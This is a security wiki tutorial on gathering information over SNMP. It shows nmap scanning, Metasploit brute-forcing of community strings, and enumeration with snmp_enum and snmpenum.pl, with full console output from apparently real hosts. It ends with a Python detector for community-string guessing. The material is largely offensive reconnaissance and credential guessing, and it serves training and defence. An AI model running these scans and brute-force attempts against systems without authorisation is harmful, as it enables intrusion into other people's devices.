Information Gathering over SNMP

From the BGA Security Wiki

Goal: gathering information from systems on which the SNMP service is enabled

Tools used:

  • Nmap
  • Metasploit
  • Solarwinds
  • Snmpenum

Steps:

Step 1: Since SNMP uses UDP port 161, we first need to find out whether this port is open on the target system. For that we run nmap against this port as a UDP scan (-sU) with the version-detection option (-sV).

sh-3.2# nmap 192.168.5.9 -p 161 -sU -sV 
Starting Nmap 6.01 ( http://nmap.org ) at 2012-12-01 15:48 EET 
Nmap scan report for (192.168.5.9)
Host is up (0.29s latency). 
PORT STATE SERVICE VERSION 
161/udp open snmp SNMPv1 server (public) 
Service Info: Host: r3.ca.smt 
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 4.57 seconds

Step 2: Let's use Metasploit to brute-force the community string used by the SNMP protocol;

root@bt:~# msfconsole
msf > use auxiliary/scanner/snmp/snmp_login 
msf auxiliary(snmp_login) > show options 
Module options (auxiliary/scanner/snmp/snmp_login): 
Name               Current Setting                                             Required  Description
----               ---------------                                             --------  -----------
BATCHSIZE          256                                                         yes       The number of hosts to probe in each set
BLANK_PASSWORDS    true                                                        no        Try blank passwords for all users
BRUTEFORCE_SPEED   5                                                           yes       How fast to bruteforce, from 0 to 5
CHOST                                                                          no        The local client address
PASSWORD                                                                       no        The password to test
PASS_FILE          /opt/metasploit/msf3/data/wordlists/snmp_default_pass.txt   no        File containing communities, one per line
RHOSTS                                                                         yes       The target address range or CIDR identifier
RPORT              161                                                         yes       The target port
STOP_ON_SUCCESS    false                                                       yes       Stop guessing when a credential works for a host
THREADS            1                                                           yes       The number of concurrent threads
USER_AS_PASS       true                                                        no        Try the username as the password for all users
VERBOSE            true                                                        yes       Whether to print output for all attempts
msf auxiliary(snmp_login) > set RHOSTS 192.168.5.9 
RHOSTS => 192.168.5.9
msf auxiliary(snmp_login) > exploit 
[*] :161SNMP - [001/118] - 192.168.5.9:161 - SNMP - Trying public... 
[*] :161SNMP - [002/118] - 192.168.5.9:161 - SNMP - Trying private... 
[*] :161SNMP - [003/118] - 192.168.5.9:161 - SNMP - Trying 0... 
[*] :161SNMP - [011/118] - 192.168.5.9:161 - SNMP - Trying CISCO... 
[+] SNMP: 192.168.5.9 community string: 'public' info: 'APC Web/SNMP Management Card (MB:v3.6.8 PF:v2.6.4 PN:apc_hw02_aos_264.bin AF1:v2.6.1 AN1:apc_hw02_sumx_261.bin MN:AP9617 HR:A10 SN: ZA0525013061 MD:06/16/2005) (Embedded PowerNet SNMP Agent SW v2.2 compatible)' 
[*] Validating scan results from 1 hosts... 
[*] Host 192.168.5.9 provides READ-WRITE access with community 'private' 
[*] Scanned 1 of 1 hosts (100% complete) 
[*] Auxiliary module execution completed
msf auxiliary(snmp_login) >

Step 3: Now that we also know the community string, let's exploit the SNMP service and gather information about the remote system. For this we use the snmp_enum module.

msf auxiliary(snmp_login) > use auxiliary/scanner/snmp/snmp_enum 
msf auxiliary(snmp_enum) > set RHOSTS 192.168.5.6 
RHOSTS => 192.168.5.6 
msf auxiliary(snmp_enum) > exploit 
[*] 192.168.5.6, Connected. 
[*] System information
Host IP : 192.168.5.6 
Hostname : r3.ca.smt 
Description : APC Web/SNMP Management Card (MB:v3.6.8 PF:v2.6.4 PN:apc_hw02_aos_264.bin AF1:v2.6.1 AN1:apc_hw02_sumx_261.bin MN:AP9617 HR:A10 SN: ZA0525013061 MD:06/16/2005 (Embedded PowerNet SNMP Agent SW v2.2 compatible)
Contact : r3ops@yandex.com 
Location : smt 
Uptime snmp : - 
Uptime system : 112 days, 07:03:31.22 
System date : - 
Network information:
IP forwarding enabled : no 
Default TTL : 64 
TCP segments received : 22873 
TCP segments sent : 18301 
TCP segments retrans : 741 
Input datagrams : 807289 
Delivered datagrams : 807281 
Output datagrams : 805841 
Network interfaces: 
Interface : [ unknown ] lance 
Id : 1 
Mac Address : 00:c0:b7:77:1f:95 
Type : unknown 
Speed : 100 Mbps 
MTU : 1500 
In octets : 77795455 
Out octets : 77176045
Network IP: 
Id       IP Address              Netmask                    Broadcast                                                          
1       192.168.5.6             255.255.255.248              1 
Routing information: 
Destination                     Next hop           Mask              Metric                                              
0.0.0.0                            192.168.5.1      0.0.0.0            -1
TCP connections and listening ports: 
Local address             Local port           Remote address    Remote port    State                  
0.0.0.0 21                    0.0.0.0 0              unknown                                                                   
0.0.0.0 23                    0.0.0.0 0              unknown                                                                 
0.0.0.0 80                    0.0.0.0 0              unknown                                                             
Listening UDP ports:    
Local address             Local port 
0.0.0.0                         33281 
0.0.0.0                         54031 
0.0.0.0                         42389 
0.0.0.0                         161 
0.0.0.0                         53962 
192.168.5.6                 9950 
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed 
msf auxiliary(snmp_enum) >

Step 4: With the Solarwinds Network IP Browser tool, the remote system's information can be accessed from a graphical interface.

[Figure: Snmp.png]

[Figure: Snmp2.png]

Step 5: Gathering information about the remote system with the Snmpenum tool;

root@bt:/pentest/enumeration/snmp/snmpenum# ./snmpenum.pl 111.1.19.23 public linux.txt 
---------------------------------------- 
UPTIME
---------------------------------------- 
18 minutes, 22.57
---------------------------------------- 
HOSTNAME 
---------------------------------------- 
ZhejiangYidong-MXZ87.hezuo.ppvod.snmp-iptables 
---------------------------------------- 
RUNNING SOFTWARE PATHS
---------------------------------------- 
init[3]
migration/0 
ksoftirqd/0
---------------------------------------- 
RUNNING PROCESSES 
---------------------------------------- 
init migration/0 
ksoftirqd/0 
watchdog/0 
migration/1
----------------------------------------
MOUNTPOINTS 
---------------------------------------- 
Memory Buffers 
Real Memory 
Swap Space 
/
/sys 
/boot 
/home/pplive/openservice/service/0 
/home/pplive/openservice/service/1 
---------------------------------------- 
SYSTEM INFO
---------------------------------------- 
Linux ZhejiangYidong-MXZ87.hezuo.ppvod.snmp-iptables 2.6.18-92.el5PAE #1 SMP Tue Apr 29 13:31:02 EDT 2008 i686
---------------------------------------- 
LISTENING UDP PORTS 
---------------------------------------- 
161 514
---------------------------------------- 
LISTENING TCP PORTS
---------------------------------------- 
21 
80 
81 
82 
8011 
8080 
8888 
10050 
19765
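
As an added example (not part of the original wiki page or of any of the tools above), the following Python shows the defender's side of step 2: it parses the version and community string out of raw SNMPv1/v2c UDP payloads and flags a source that tries many distinct community strings within a short window, which is exactly the traffic pattern snmp_login produces. The packet builder only generates constructed test traffic; all function names, the 60-second window and the threshold of 10 are assumptions.

```python
from collections import defaultdict
# SNMPv1/v2c message (BER): SEQUENCE { INTEGER version, OCTET STRING community, PDU }. Guessing shows
# up as one source sending requests with many *different* community strings in a short window.

def _tlv(tag: int, body: bytes) -> bytes:
    assert len(body) < 128, "short-form BER length only"    # every body built here is small
    return bytes([tag, len(body)]) + body

def build_v1_get(community: str) -> bytes:
    """Construct a minimal SNMPv1 GetRequest for sysDescr.0 (1.3.6.1.2.1.1.1.0); test traffic only."""
    oid = _tlv(0x06, bytes([0x2B, 6, 1, 2, 1, 1, 1, 0]))        # OBJECT IDENTIFIER
    varbind = _tlv(0x30, oid + _tlv(0x05, b""))                  # VarBind { oid, NULL }
    ints = _tlv(0x02, b"\x01") + _tlv(0x02, b"\x00") + _tlv(0x02, b"\x00")  # request-id, error-status, error-index
    pdu = _tlv(0xA0, ints + _tlv(0x30, varbind))                 # GetRequest-PDU
    return _tlv(0x30, _tlv(0x02, b"\x00") + _tlv(0x04, community.encode()) + pdu)  # version 0 = SNMPv1

def _read_tlv(buf: bytes, pos: int):
    """Decode the BER TLV at pos -> (tag, value, next_pos); handles long-form lengths too."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                                            # long form: next n bytes hold the length
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    if pos + length > len(buf): raise ValueError("truncated TLV")
    return tag, buf[pos:pos + length], pos + length

def parse_snmp_header(payload: bytes):
    """Return (version, community) of an SNMPv1/v2c message, or None if the payload is not SNMP-shaped."""
    try:
        tag, body, _ = _read_tlv(payload, 0)
        vtag, ver, pos = _read_tlv(body, 0)
        ctag, comm, _ = _read_tlv(body, pos)
    except (IndexError, ValueError):
        return None
    if tag != 0x30 or vtag != 0x02 or ctag != 0x04:
        return None
    return int.from_bytes(ver, "big"), comm.decode("ascii", "replace")

def detect_community_guessing(events, window: float = 60.0, threshold: int = 10) -> dict:
    """events: (timestamp, src_ip, udp_payload); returns {src_ip: distinct communities} for sources hitting threshold within window."""
    history = defaultdict(list)                                  # src_ip -> [(ts, community)]
    alerts = {}
    for ts, src, payload in sorted(events, key=lambda e: e[0]):
        hdr = parse_snmp_header(payload)
        if hdr is None: continue                                 # not SNMP, ignore
        history[src].append((ts, hdr[1]))
        recent = {c for t, c in history[src] if ts - t <= window}
        if len(recent) >= threshold:
            alerts[src] = max(alerts.get(src, 0), len(recent))
    return alerts
```

Because step 2 shows 'private' granting READ-WRITE on the device, a separate alert on any successful response to a default community string ('public', 'private') is worth running alongside this rate-based check.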